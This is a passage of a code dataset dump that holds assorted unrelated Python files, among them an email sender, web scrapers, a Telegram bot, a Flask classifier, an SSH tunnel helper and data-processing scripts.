non-HTML email clients.\n body_text = (\"This is a Test (Python) welcome email!\\r\\n\"\n \"This email was sent with Amazon SES using the \"\n \"AWS SDK for Python (Boto).\"\n )\n\n # The HTML body of the email.\n body_html = \"\"\"\n \n \n

TEST welcome to Success Academy {0}

\n

This email was sent with\n Amazon SES using the\n \n AWS SDK for Python (Boto).

\n \n \n \"\"\".format(student['Name'])\n\n # The character encoding for the email.\n char_set = \"UTF-8\"\n\n # Create a new SES resource and specify a region.\n client = boto3.client('ses', region_name=aws_region)\n\n # Try to send the email.\n try:\n # Provide the contents of the email.\n response = client.send_email(\n Destination={\n 'ToAddresses': [\n recipient,\n ],\n },\n Message={\n 'Body': {\n 'Html': {\n 'Charset': char_set,\n 'Data': body_html,\n },\n 'Text': {\n 'Charset': char_set,\n 'Data': body_text,\n },\n },\n 'Subject': {\n 'Charset': char_set,\n 'Data': subject,\n },\n },\n Source=sender,\n\n )\n # Display an error if something goes wrong.\n except botocore.exceptions.ClientError as e:\n print(e.response['Error']['Message'])\n else:\n print(\"Email sent! Message ID:\"),\n print(response['MessageId'])\n else:\n print('Invalid Student {0} email {1}'.format(student['ID'], student['email']))\n\n\ndef main():\n student_data = get_students()\n send_student_email(student_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KitCassetta/AntFarm","sub_path":"SuccessAcadamyDevActivity/AntCassetta_SuccesAcademyActivity/WelcomeStudentsAWS.py","file_name":"WelcomeStudentsAWS.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33147056778","text":"# [문제] 네이버 날씨 페이지에서 이미지 다운로드 하시오.\n# 저장위치 : d:\\img\\오늘날짜\n# 파일명 : 시분밀리세컨드.jpg\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom datetime import date, datetime\n# import requests\nimport os\n\nurl = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=%EB%82%A0%EC%94%A8'\nhtml = request.urlopen(url).read()\nsoup = BeautifulSoup(html, 'html.parser')\n\ntoday = str(date.today()).replace('-', '')\nfolder_path = f'd:\\\\img\\\\{today}\\\\'\n\n# video_list = soup.find('div', class_='list_square')\nimg_list = soup.find_all('img', class_='api_img')\n\n# if not os.path.exists(save_path):\n# os.makedirs(save_path)\nos.makedirs(folder_path, exist_ok=True)\n\nfor img in img_list:\n save_time = str(datetime.now().strftime('%H%M%f'))\n save_path = os.path.join(folder_path, save_time+'.png')\n request.urlretrieve(img['data-lazysrc'], save_path)\n","repo_name":"fkdlrj125/webservice","sub_path":"python/p230425/img_download_quiz01.py","file_name":"img_download_quiz01.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73732552950","text":"from django.db import models\nfrom django.forms import DateTimeField\n\n# Create your models here.\nclass Blog(models.Model):\n title = models.CharField(max_length=20)\n post = models.CharField(max_length=200)\n videofile= models.FileField(upload_to='videos/', null=True)\n image= models.ImageField(upload_to = 'images/',null = True)\n event_date = DateTimeField(input_formats=[\"%d %b %Y %H:%M:%S %Z\"])\n\n @classmethod\n def get_all(cls):\n pics = cls.objects.all()\n return pics\n\n def __str__(self):\n return self.caption + str(self.videofile)\n","repo_name":"DavidNganga/wblog","sub_path":"nimo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38219051774","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom deep_translator import GoogleTranslator\nfrom langdetect import detect_langs\n\ndef translating(data, col_text_name = 'text', tr_language = 'en', save_mode = 'pickle'):\n res = []\n n = 0\n for i in range(len(data[col_text_name])):\n det = detect_langs(data[col_text_name][i])\n if det[0].lang == tr_language and det[0].prob > 0.9:\n res.append(data[\"summary\"][i])\n continue\n\n if (n + 1) % 100 == 0:\n time.sleep(77)\n translated = GoogleTranslator(source='auto', target=tr_language).translate(text=data[col_text_name][i])\n res.append(translated)\n n = n + 1\n data[\"translated_text\"] = res\n if save_mode == 'csv':\n data.to_csv(\"outputs/data_plus_translated.csv\", sep=\",\", index=False)\n else:\n data.to_pickle(\"outputs/data_plus_translated.pickle\")","repo_name":"MgDuck/TS-APP","sub_path":"src/text_to_translate.py","file_name":"text_to_translate.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27938417896","text":"import logging\n\nfrom config import LOG_FILE\n\n_g_logger = None\n\n\ndef get_logger():\n global _g_logger\n if _g_logger is None:\n logging.basicConfig(filename=LOG_FILE, level=logging.INFO)\n __datetime = \"%Y-%m-%d %H:%M:%S\"\n __format_str = \"%(asctime)s %(levelname).1s [%(filename)s:%(lineno)s] %(message)s\"\n _g_logger = logging.getLogger()\n # stream header\n formater = logging.Formatter(__format_str, __datetime)\n handler = logging.StreamHandler()\n handler.setFormatter(formater)\n _g_logger.addHandler(handler)\n return _g_logger\n\n\nlogger = get_logger()","repo_name":"Lmineor/tiaoji_spider","sub_path":"Slog.py","file_name":"Slog.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5664114871","text":"import os\nimport pathlib\n\nfrom taksonomia.machine import Machine\n\n\ndef test_machine():\n folder = pathlib.Path('test', 'fixtures', 'corner')\n pid = os.getpid()\n machine = Machine(str(folder), pid)\n assert str(machine)\n assert machine.context()\n assert machine.perf()\n","repo_name":"sthagen/taksonomia","sub_path":"test/test_machine.py","file_name":"test_machine.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"17756340134","text":"from typing import List\n\nimport numpy as np\n\nfrom Data.data import get_answers\n\nwords = get_answers()\n\n\ndef get_remaining_words_guess_known(word_list: List[str], wordle_state):\n # Word list has to be lower case.\n guess = [x.lower() for x in wordle_state[0]]\n correct_letters = [x.lower() for x in wordle_state[1]]\n common_letters = \"\".join(wordle_state[2]).replace(\" \", \"\").lower()\n uncommon_letters = list(set(guess) - set(common_letters) - set(\"\".join(correct_letters).replace(\" \", \"\")))\n\n new_list = [w for w in word_list if all(c in w for c in common_letters)]\n new_list = [w for w in new_list if not any(c in w for c in uncommon_letters)]\n new_list = [w for w in new_list if all(c in w for c in \"\".join(correct_letters).replace(\" \", \"\"))]\n\n final_list = set(new_list)\n for word in new_list:\n w = list(word)\n\n for i in range(5):\n if not w[i] != correct_letters[i] and correct_letters[i] != \" \":\n final_list.add(word)\n\n return np.array(list(final_list))\n\n\ndef get_possible_words(word, word_list):\n \"\"\"\n Gets list of without words that do not provide information given\n the word param.\n :param word: Word.\n :param word_list: Word List.\n :return:\n \"\"\"\n\n return [w for w in word_list if any(c in w for c in word)]\n","repo_name":"EMAT31530/ai-group-project-group-2","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"72465928948","text":"class Solution:\n def longestIdealString(self, s: str, k: int) -> int:\n n = len(s)\n ans = 1\n dp = [1] * n\n d = {s[0]: 0}\n for i in range(1, n):\n a = ord(s[i])\n for b in ascii_lowercase:\n if abs(a - ord(b)) > k:\n continue\n if b in d:\n dp[i] = max(dp[i], dp[d[b]] + 1)\n d[s[i]] = i\n return max(dp)\n","repo_name":"doocs/leetcode","sub_path":"solution/2300-2399/2370.Longest Ideal Subsequence/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":25791,"dataset":"github-code","pt":"94"} +{"seq_id":"19577106999","text":"import os\nimport re\n\nfrom pyrogram import Client, filters\nfrom pyrogram.enums import ParseMode\n\nfrom openai.error import InvalidRequestError\n\nfrom utils import formatDescription\nfrom openAI import generateImageUrls, generateVariationUrls\n\n\nV_NEXT = False\n\n@Client.on_message(filters.command(\"variation\"))\nasync def variations_(bot, message):\n global V_NEXT\n V_NEXT = True\n reply = \"Send the base image and a caption in the format below.\\n\\n`%\\n\\n> Note: The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\"\n await bot.send_message(message.chat.id, reply, parse_mode = ParseMode.MARKDOWN)\n\n\n@Client.on_callback_query(filters.regex(\"Variation\"))\nasync def variations(bot, callback):\n global V_NEXT\n V_NEXT = True\n message = \"Send the base image and a caption in the format below.\\n\\n`%\\n\\n> Note: The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\"\n await bot.send_message(callback.message.chat.id, message, parse_mode = ParseMode.MARKDOWN)\n\n@Client.on_message(filters.photo)\nasync def sendVariations(bot, message):\n global V_NEXT\n if V_NEXT:\n chat_id = message.chat.id\n pattern = re.compile(r\"[0-9]+%[0-9]+x[0-9]+\", flags=re.I|re.M)\n if pattern.match(message.caption):\n await bot.download_media(message.photo, \"images/photo.png\")\n request = await formatDescription(message.caption, True)\n try:\n await bot.send_message(chat_id, \"Generating Variations 🧭\")\n responses = await generateVariationUrls(\n \"images/photo.png\",\n request[\"n\"],\n request[\"size\"]\n )\n except InvalidRequestError as e:\n await bot.send_message(chat_id, \"âš  You used the wrong syntax. Try again but make sure the caption of the image is in this format. '`%`' and don't forget the rules\\n\\n> The image needs to be a square PNG file that's less than 4MB in size.\\n> You can only generate up to 10 images.\\n> There are three acceptable options for the image size: 256x256, 512x512, and 1024x1024.`\\nYou're welcome by the way😉\", parse_mode = ParseMode.MARKDOWN)\n print(e.error)\n else:\n for response in responses:\n await bot.send_photo(chat_id, response['url'])\n os.remove(\"images/photo.png\")\n await bot.send_message(chat_id, \"Here are the images you asked for.\")\n V_NEXT = False\n\n","repo_name":"OluwaFavour/Telegram-OpenAI-Bot","sub_path":"plugins/handlers/variationsButton.py","file_name":"variationsButton.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"43313564696","text":"from yahoo import getYahooInfo\nfrom amazon import getAmazonInfo\nimport logging\n\ndef getGoodsCsv(url): \n\n sth = logging.StreamHandler()\n flh = logging.FileHandler('./debug.log')\n logging.basicConfig(level=logging.INFO, handlers=[sth, flh])\n logger = logging.getLogger(__name__)\n logger.info('--- getGoodsCsv start ---')\n\n yahooInfos= getYahooInfo(url)\n\n results = ['Yahoo JAN,Yahoo販売価格,ASIN,Amazon販売価格']\n for yahooInfo in yahooInfos:\n if not yahooInfo['janCode']:\n continue\n\n amazonInfo = getAmazonInfo(yahooInfo['janCode'])\n results.append(','.join([yahooInfo['janCode'], yahooInfo['price'], amazonInfo['asin'], amazonInfo['price']]))\n\n logger.info('--- getGoodsCsv end ---')\n return \"\\n\".join(results)\n\nif __name__ == '__main__':\n csv = getGoodsCsv('https://store.shopping.yahoo.co.jp/bestexcel/search.html')\n print(csv)","repo_name":"murotani-hiroki/python_webdriver","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"36249401430","text":"# -*- coding: utf-8 -*-\n\nimport csv\nimport gzip\nimport numpy as np\nimport numpy.ma as ma\nimport os\nfrom pprint import pprint\nimport sys\n\ndef printProgress(step, total):\n sys.stdout.write('\\r')\n sys.stdout.write(\"%s%%\" % round(1.0*step/total*100,2))\n sys.stdout.flush()\n\n\ndef readCsv(filename, fillValue=None):\n values = np.array([])\n if os.path.isfile(filename):\n print(\"Reading %s...\" % filename)\n lines = []\n f = gzip.open(filename, 'rt', encoding=\"utf8\") if filename.endswith(\".gz\") else open(filename, 'r', encoding=\"utf8\")\n lines = list(f)\n f.close()\n height = len(lines)\n if height > 0:\n width = len(lines[0].split(\",\"))\n values = np.zeros((height, width))\n for i, line in enumerate(lines):\n row = np.zeros(width)\n for j, value in enumerate(line.split(\",\")):\n row[j] = float(value)\n values[i] = row\n\n # mask values that are invalid\n if fillValue is not None:\n values = ma.masked_values(values, fillValue)\n\n return values\n","repo_name":"amnh-sciviz/nasa-ndvi","sub_path":"lib/io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1386132557","text":"import argparse\n\nfrom engine import PluginEngine\nfrom pydesktools.win import Win\nfrom util import FileSystem\n\nfrom tkinter import *\nfrom tkinter import ttk\n\n\ndef __description() -> str:\n return \"Create your own anime meta data\"\n\n\ndef __usage() -> str:\n return \"Vrv-meta.py --setvice vrv\"\n\n\ndef __init_cli() -> argparse:\n parser = argparse.ArgumentParser(description=__description(), usage=__usage())\n parser.add_argument(\n \"-l\",\n \"--log\",\n default=\"DEBUG\",\n help=\"\"\"\n Specify log level which should use. Default will always be DEBUG, choose between the following options\n CRITICAL, ERROR, WARNING, INFO, DEBUG\n \"\"\",\n )\n\n print(\"FileSystem\", FileSystem)\n parser.add_argument(\n \"-d\",\n \"--directory\",\n default=f\"{FileSystem.get_plugins_directory()}\",\n help=\"\"\"\n (Optional) Supply a directory where plugins should be loaded from. The default is ./plugins\n \"\"\",\n )\n return parser\n\n\ndef __print_program_end() -> None:\n print(\"---End of execution---\")\n\n\ndef __init_app(parameters: dict) -> None:\n PluginEngine(options=parameters).start()\n\n\ndef __init_win() -> None:\n # sets up the main application window\n root = Tk()\n # init function\n Win(root)\n # necessary for everything to appear onscreen and allow users to interact with it.\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n __cli_args = __init_cli().parse_args()\n __init_app({\"log_level\": __cli_args.log, \"directory\": __cli_args.directory})\n __init_win()\n","repo_name":"openHacking/PyDeskTools","sub_path":"src/pydesktools/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"41832431948","text":"# https://www.ziwenxie.site/\n# 解析 ZiWenXie 的脚本\nfrom bs4 import BeautifulSoup\n\norigin = 'https://www.ziwenxie.site/'\n\ndef parseZiWenXie(content=\"\"):\n page = dict()\n if not content:\n return page\n # 获取 soup 对象\n soup = BeautifulSoup(content, 'html.parser')\n # 页面标题\n page['title'] = soup.title.string\n\n blogs = list()\n blogContainer = soup.find(id='wrapper')\n if blogContainer:\n articles = blogContainer.find_all('article')\n for article in articles:\n blog = dict()\n blog['publishTime'] = article.time.a.string\n blog['id'] = article.h1.a['href']\n blog['href'] = 'https://www.ziwenxie.site' + article.h1.a['href']\n blog['title'] = article.h1.a.string\n blogs.append(blog)\n\n # 所有博客列表\n page['blogs'] = blogs\n page['blogCount'] = len(blogs)\n page['origin'] = origin\n return page\n","repo_name":"BaoXuebin/BlogSpider","sub_path":"parse/ZiWenXie.py","file_name":"ZiWenXie.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"14745302020","text":"import tenseal as ts\nimport pickle\n\n# QUESTION: 2\ncontext_q2 = ts.context(ts.SCHEME_TYPE.BFV, poly_modulus_degree=4096, plain_modulus=1032193)\nplain_vector = [138]\nencrypted_vector = ts.bfv_vector(context_q2, plain_vector)\nresult_q2 = encrypted_vector * [914]\n\n# QUESTION: 3\nwith open('R11922138.pkl', 'rb') as f:\n given = pickle.load(f)\ncontext_q3 = ts.context_from(given['context'])\nencrypted_a = ts.bfv_vector_from(context_q3, given['encrypted_a'])\nencrypted_b = ts.bfv_vector_from(context_q3, given['encrypted_b'])\nresult_q3 = encrypted_a * 138 + encrypted_b\n\n# package results\nresult = {\n 'q2_context': context_q2.serialize(save_secret_key=True),\n 'q2_result': result_q2.serialize(),\n 'q3_result': result_q3.serialize()\n}\nwith open('R11922138_a1.pkl', 'wb') as f:\n pickle.dump(result, f)\n# with open('R11922138_a1.pkl', 'rb') as f:\n# given = pickle.load(f)\n# context = ts.context_from(given['q2_context'])\n# print(ts.bfv_vector_from(context, given['q2_result']).decrypt())\n# print(ts.bfv_vector_from(context_q3, given['q3_result']))\n","repo_name":"eric070021/2022-Topics-in-Secure-Artificial-Intelligence-Systems","sub_path":"HW1/hw1_part2.py","file_name":"hw1_part2.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4167283126","text":"from flask import Flask, render_template, request\r\nimport joblib\r\nimport pandas as pd\r\nimport numpy as np\r\nimport csv\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = joblib.load('model.pkl')\r\n\r\n@app.route(\"/\")\r\ndef hello_world():\r\n return render_template(\"index.html\")\r\n\r\n\r\n@app.route('/predict', methods=['POST'])\r\ndef predict():\r\n # Get the input data from the form\r\n experience = request.form['Experience']\r\n education = request.form['Education']\r\n employment = request.form['Employment']\r\n telecommuting = request.form['Telecommuting']\r\n logo = request.form['Logo']\r\n question = request.form['Question']\r\n \r\n \r\n my_dict ={\"telecommuting\": telecommuting, \"has_company_logo\": logo, \"has_questions\": question,\r\n \"employment_type\": employment, \"required_experience\": experience, \"required_education\": education}\r\n \r\n input_data = pd.DataFrame([my_dict])\r\n \r\n prediction = model.predict(input_data)\r\n my_list = prediction.tolist()\r\n prediction_proba = model.predict_proba(input_data)\r\n my_list2 = prediction_proba.tolist()\r\n \r\n with open('new_train_data.csv', 'a') as my_file:\r\n my_file.writelines(f\"{telecommuting},{logo},{question},{employment},{experience},{education}\\n\")\r\n \r\n \r\n if my_list[0] == 1:\r\n answer = f\"This is likely to be a Fraudulent Job Post with an accuracy of {(round(my_list2[0][1], 2) * 100)}%\"\r\n return render_template('results.html', answer=answer)\r\n else:\r\n answer = f\"This is a Valid Job Post with an accuracy of {(round(my_list2[0][0], 2) * 100)}% Apply Now\"\r\n return render_template('results.html', answer=answer)\r\n \r\n \r\n@app.route('/submit_feedback', methods=['POST'])\r\ndef submit_feedback():\r\n feedback = request.form.get('feedback')\r\n \r\n with open('new_target_column.csv', 'a') as my_file:\r\n my_feedback = my_file.writelines(f\"{feedback}\\n\")\r\n \r\n return render_template('results2.html')\r\n\r\n\r\n","repo_name":"Aquila-byte/JobClassifier","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"37503963706","text":"from collections import deque\nn = int(input())\nif n == 1:\n print(0)\n print(1)\n exit(0)\n\nvisit = [0]*(n+1)\nq = deque([n])\n\nwhile q:\n now = q.popleft()\n x = []\n if not now % 3:\n x.append(now//3)\n if not now % 2:\n x.append(now//2)\n x.append(now-1)\n c = False\n for i in x:\n if not visit[i]:\n visit[i] = now\n q.append(i)\n if i == 1:\n c = True\n break\n if c:\n break\n\ny = 1\nr = [1]\nwhile y != n:\n y = visit[y]\n r.append(y)\nr.reverse()\nprint(len(r)-1)\nprint(*r)\n","repo_name":"Seungwuk98/Algorithm-Solving-python3","sub_path":"12852BOJ_make1.py","file_name":"12852BOJ_make1.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24648671517","text":"\"\"\"\nModule for creating persistent SSH connections for use with synchronous\ncommands. Typically, tunnels should be invoked as a context manager to\nensure proper cleanup. E.G.:\nwith tunnel(*args, **kwargs) as my_tunnel:\n my_tunnel.write_to_remote('/usr/local/usrpath/testfile.txt', 'test_file.txt')\n my_tunnel.remote_cmd(['cat', 'test_file.txt'])\n\"\"\"\nimport logging\nimport os\nimport stat\nimport tempfile\nfrom contextlib import contextmanager, ExitStack\nfrom subprocess import check_call, check_output, TimeoutExpired\nfrom typing import Optional\n\nfrom pkgpanda.util import write_string\n\nlogger = logging.getLogger(__name__)\n\n\nclass Tunnelled():\n def __init__(self, base_cmd: list, host: str, target: str):\n self.base_cmd = base_cmd\n self.host = host\n self.target = target\n\n def remote_cmd(self, cmd: list, timeout: Optional[int]=None, stdout=None):\n \"\"\"\n Args:\n cmd: list of strings that will be interpretted in a subprocess\n timeout: (int) number of seconds until process timesout\n stdout: file object to redirect stdout to\n \"\"\"\n run_cmd = self.base_cmd + [self.target] + cmd\n logger.debug('Running socket cmd: ' + ' '.join(run_cmd))\n try:\n if stdout:\n return check_call(run_cmd, stdout=stdout, timeout=timeout)\n else:\n return check_output(run_cmd, timeout=timeout)\n except TimeoutExpired as e:\n logging.exception('{} timed out after {} seconds'.format(cmd, timeout))\n logging.debug('Timed out process output:\\n' + e.output.decode())\n raise\n\n def write_to_remote(self, src: str, dst: str):\n \"\"\"\n Args:\n src: local path representing source data\n dst: destination for path\n \"\"\"\n cmd = self.base_cmd + ['-C', self.target, 'cat>' + dst]\n logger.debug('Running socket write: ' + ' '.join(cmd))\n with open(src, 'r') as fh:\n check_call(cmd, stdin=fh)\n\n\n@contextmanager\ndef temp_data(key):\n temp_dir = tempfile.mkdtemp()\n socket_path = temp_dir + '/control_socket'\n key_path = temp_dir + '/key'\n write_string(key_path, key)\n os.chmod(key_path, stat.S_IREAD | stat.S_IWRITE)\n yield (socket_path, key_path)\n os.remove(key_path)\n # might have been deleted already if SSH exited correctly\n if os.path.exists(socket_path):\n os.remove(socket_path)\n os.rmdir(temp_dir)\n\n\n@contextmanager\ndef tunnel(user: str, key: str, host: str, port: int=22):\n target = user + '@' + host\n\n with temp_data(key) as temp_paths:\n base_cmd = [\n '/usr/bin/ssh',\n '-oConnectTimeout=10',\n '-oControlMaster=auto',\n '-oControlPath=' + temp_paths[0],\n '-oStrictHostKeyChecking=no',\n '-oUserKnownHostsFile=/dev/null',\n '-oBatchMode=yes',\n '-oPasswordAuthentication=no',\n '-p', str(port)]\n\n start_tunnel = base_cmd + ['-fnN', '-i', temp_paths[1], target]\n logger.debug('Starting SSH tunnel: ' + ' '.join(start_tunnel))\n # Test Code\n check_call(start_tunnel)\n logger.debug('SSH Tunnel established!')\n\n yield Tunnelled(base_cmd, host, target)\n\n close_tunnel = base_cmd + ['-O', 'exit', target]\n logger.debug('Closing SSH Tunnel: ' + ' '.join(close_tunnel))\n check_call(close_tunnel)\n\n\n@contextmanager\ndef tunnel_collection(user, key, host_names: list):\n \"\"\"Convenience collection of Tunnels so that users can keep\n multiple connections alive with a single self-closing context\n Args:\n user: user with access to host\n key: contents of private key\n host_names: list of locally resolvable hostname:port to tunnel to\n \"\"\"\n\n with ExitStack() as exit_stack:\n logger.debug('Creating TunnelCollection for the following: ' + str(host_names))\n tunnels = list()\n for host in host_names:\n ip, port = host.split(':')\n tunnels.append(exit_stack.enter_context(tunnel(user, key, ip, port)))\n logger.debug('Successfully created TunnelCollection')\n yield tunnels\n","repo_name":"mesosphere-backup/dcos-bot-branches","sub_path":"ssh/tunnel.py","file_name":"tunnel.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"29620219227","text":"# --- IMPORT ---\nfrom tkinter import *\nfrom tkinter.font import BOLD\n\n# --- FUNCTIONS ---\ndef find_dividers(n):\n \"\"\"Return a joined of dividers of n\"\"\"\n\n # Convert int into str to use join list method later\n pos_div = [str(i) for i in range(1, abs(n)+1) if n % i == 0]\n neg_div = [str(i) for i in range(-abs(n), 0) if n % i == 0]\n\n # Create a list of all dividers\n dividers = neg_div + pos_div\n return \", \".join(dividers) # string of dividers\n\ndef divider_list():\n \"\"\"Set output an error message or informations about dividers of entry value\n\n No key argument\n \"\"\"\n\n try:\n num = int(wrapper_entry.get())\n except:\n wrapper_entry[\"text\"] = \"\" # Reset entry\n output[\"fg\"] = \"#f23557\"\n output[\"text\"] = \"Please enter a valid value!\" # Error message\n return # Stop function\n\n # No exception\n output[\"fg\"] = \"white\"\n if num == 0:\n output[\"text\"] = \"INFINITE NUMBER OF DIVIDERS\"\n else:\n output[\"text\"] = f\"Dividers are:\\n{find_dividers(num)}\"\n\n\n# ************** CORE OF THE APPLICATION **************\n\n# --- MAIN WINDOW ---\n# Create window and set title\nwindow = Tk()\nwindow.title(\"Dividers\")\n\n# Set default and minimal dimensions of the window\nwindow.geometry(\"1080x720\")\nwindow.minsize(720,480)\n\n# Customization of window\nwindow.config(bg=\"#2082d8\")\nwindow.iconbitmap(\"img/pi-icon.ico\")\n\n\n# --- FRAME AND COMPONENTS ---\nwrapper = Frame(window, bg=\"#184e76\", padx=25, pady=25)\n\n# Give wrapper a title\nwrapper_title = Label(wrapper, text=\"DIVIDERS\", fg=\"white\", bg=\"#184e76\", font=(\"Courier\", 50, BOLD))\nwrapper_title.pack()\n\n# Add a instruction label\n# to say user what to do\nwrapper_instruction = Label(wrapper, text=\"Please, enter an integer\", fg=\"#fdb44b\", bg=\"#184e76\", font=(\"Courier\", 18, BOLD))\nwrapper_instruction.pack()\n\n# Create a entry for user\nwrapper_entry = Entry(wrapper, justify=\"center\", fg=\"black\", bg=\"#e7eaf6\", font=(\"Courier\", 25, BOLD))\nwrapper_entry.pack(pady=10)\n\n# Add a launcher of \"divider_list\" function\nwrapper_btn = Button(wrapper, text=\"Launch!\", fg=\"#184e76\", bg=\"#fdb44b\", font=(\"Courier\", 25, BOLD), command=divider_list)\nwrapper_btn.pack(pady=15)\n\n# Add wrapper\n# and all its components into main window\nwrapper.pack(expand=TRUE)\n\n# Output for dividers\noutput = Label(window, bg=\"#2082d8\", font=(\"Courier\", 20, BOLD))\noutput.pack(expand=TRUE, fill=BOTH)\n\n# Display main window\nwindow.mainloop()\n","repo_name":"loickcherimont/Dividers","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"6605660687","text":"\"\"\"\nThis script takes a Scopus and Web of Science file and merges them to a single dataset,\nremoving duplicates. For further information, see README.md\nShare without any restrictions.\n\"\"\"\n\nimport csv\nimport re\nprint(\"Usage: python3 woscop.py [scopus filename.csv] [wos filename .tsv]\\n\" + \"-\" * 40)\nfrom sys import argv\n\nscript, scopusfile, wosfile = argv\n\nscopuscsv = open(scopusfile,'r') # change file-name here\nscopusdata = csv.reader(scopuscsv, delimiter=',', quotechar='\"')\n\nwostsv = open(wosfile, 'r')\nwosdata = csv.reader(wostsv, delimiter='\\t')\n\n#For debugging only, verify with your original download of records.\nscopuscount = 0\nwoscount = 0\n\nrecordlist = [] #Holds the extracted data from the loops\ntherecords = {} #Takes the duplicate check string as key and the rest of the data as value\n\n#Loops to extract the duplicate check string and the desired fields in the data.\nfor s in scopusdata:\n scopuscount += 1 #Just to count\n #print(s[0]) #print whatever you want to add. See headers in the csv file\n stitlelowered = s[1].lower() #just making lower cases\n ssplitted = stitlelowered.split() #split up the words in the title\n sfirstsevenwords = ssplitted[0:6] # add only the first seven words to avoid dual language titles\n sjoined = ''.join(sfirstsevenwords) # join back again.\n stitlenonspecialchar = re.sub(r'[^A-Za-z0-9]+',r'',sjoined) # remove everything except words and numbers\n recordlist.append([stitlenonspecialchar, s[0], s[2], s[1], s[2], s[3], s[4]]) # put everything you want in a list\n\nfor w in wosdata:\n woscount += 1\n #print(w)\n #print(w[1])\n titlelowered = w[8].lower()\n splitted = titlelowered.split()\n firstsevenwords = splitted[0:6]\n joined = ''.join(firstsevenwords)\n titlenonspecialchar = re.sub(r'[^A-Za-z0-9]+',r'',joined)\n recordlist.append([titlenonspecialchar, w[1], w[44], w[8], w[9], w[45], w[46]])\n\n# Takes the duplicate check string as a key in the dictionary and the rest as value\nfor r in recordlist:\n therecords.update({r[0]: [r[1], r[2], r[3], r[4], r[5], r[6]]})\n\n# This removes duplicates by adding only if the duplicate checker does NOT exist in the result dict.\nresult = {}\nfor key, value in therecords.items():\n if key not in list(result.values()):\n result[key] = value\n\n# Open and write to a new csv.\nwith open('output.csv', 'w') as csvfile:\n fieldnames = ['Author', 'Year', 'Title', 'Journal', 'Volume', 'Issue'] #add here whatever you need\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quotechar='\"')\n writer.writeheader()\n for key, value in sorted(result.items()):\n #print(value[0])\n writer.writerow({'Author': value[0], 'Year': value[1], 'Title': value[2], 'Journal': value[3], 'Volume': value[4], 'Issue': value[5]}) # Then add here also\n\n#Print some control information\nprint(\"There were originally \" + str(scopuscount - 1) + \" Scopus records and \" + str(woscount - 1) + \" WoS records.\")\nprint(\"Duplicates excluded, there are now \" + str(len(therecords)) + \" records.\")\nprint(\"Writing to file \" + str(len(result)) + \" records.\\n File written: output.csv\")\n","repo_name":"christopherkullenberg/WoScop","sub_path":"woscop.py","file_name":"woscop.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"7800663518","text":"import sys\n\nimport cv2\nimport gflags\nimport numpy as np\nfrom . import parse_dataset\n\n\ndef resize_and_crop(img, size, return_mask=False, border_mode='replicate'):\n '''\n We keep the whole image content and pad if necessary.\n '''\n h, w = img.shape\n\n longer_side = max(h, w)\n\n scale = float(size) / longer_side\n\n img2 = cv2.resize(img, None, fx=scale, fy=scale)\n\n padleft = (size - img2.shape[1]) // 2\n padright = size - img2.shape[1] - padleft\n padtop = (size - img2.shape[0]) // 2\n padbottom = size - img2.shape[0] - padtop\n\n if border_mode == 'replicate':\n padded = 